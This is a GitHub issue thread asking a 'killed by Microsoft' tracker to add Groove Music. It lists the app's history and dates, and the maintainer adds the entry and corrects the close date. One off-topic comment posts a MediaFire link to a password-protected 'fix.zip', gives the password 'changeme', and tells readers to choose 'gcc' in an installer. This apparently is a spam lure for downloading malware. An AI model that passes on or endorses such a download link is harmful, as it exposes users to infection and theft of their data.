### ISSUE TITLE
Add Groove Music

### ISSUE THREAD

**Issue by Planefly1000** [fabianoriccardi/killed-by-microsoft#125]
**What's the Product's Name?**
Groove Music
**Describe the product in a single sentence.**
Groove Music (formerly Xbox Music and Zune Marketplace) was an audio player software application that included with Windows 8 to Windows 11
**When was the product launched? Provide a specific date, if possible.**
July 6, 2015
**When was the product discontinued? Provide a specific date, if possible.**
June 2023
**What type of product was it? App, Service, OS, or Hardware?**
App

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fabianoriccardi** [comment]
Added, even if I have changed a bit the description, I'm not sure Zune Marketplace is just a "name changing" or a new product w.r.t. Groove Music.

And the close date is Jan-2022, when it was removed from Win11.

**Comment by fabianoriccardi** [comment]
Anyway, you are a kind of dead product hunter 😂
